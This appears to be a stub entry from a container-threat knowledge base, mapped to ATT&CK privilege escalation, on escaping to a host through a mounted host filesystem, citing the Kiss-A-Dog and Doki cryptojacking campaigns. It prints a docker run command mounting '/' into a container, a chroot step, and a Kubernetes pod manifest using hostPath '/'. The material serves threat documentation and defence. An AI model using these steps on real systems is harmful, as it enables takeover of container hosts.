Exploiting host mount to escape to host

Tags

K8s

ATT&CK Tactic

Privilege Escalation (TA0004)

Incidents

Kiss-A-Dog campaign Doki cryptojacking campaign

References

https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/https://docs.docker.com/storage/bind-mounts/https://kubernetes.io/docs/concepts/storage/volumes/#hostpath

Last edited

Jan 18, 2024 1:25 PM

Status

Stub

In the case of the Kiss-a-Dog campaign, this was the escape method from the container (ran on through the exposed Docker socket) and to the host.

Attacker needs to start the new container with the -v or —mount options if using docker client or other options if using another CRI. When specifying the mounted host volume, an attacker specifies the source path to be “/” or another useful folder like so:

docker run -d \
  -it \
  --name devtest \
  -v "/:/host-root \
  malicious:image

Next, from within the container the / host directory is accessible through /host-root. Typically the next operation would be chroot-ing the /host-root to use the binaries on the host.

Similar mapping can be done on other CRIs (crio, containerd, podman) and on Kubernetes pod directly. For example:

apiVersion: v1
kind: Pod
metadata:
  name: malicious-pod
spec:
  containers:
  - image: registry.k8s.io/malicious:latest
    name: nginx
    volumeMounts:
    - mountPath: /test-pd
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      # directory location on host
      path: /
      # this field is optional
      type: Directory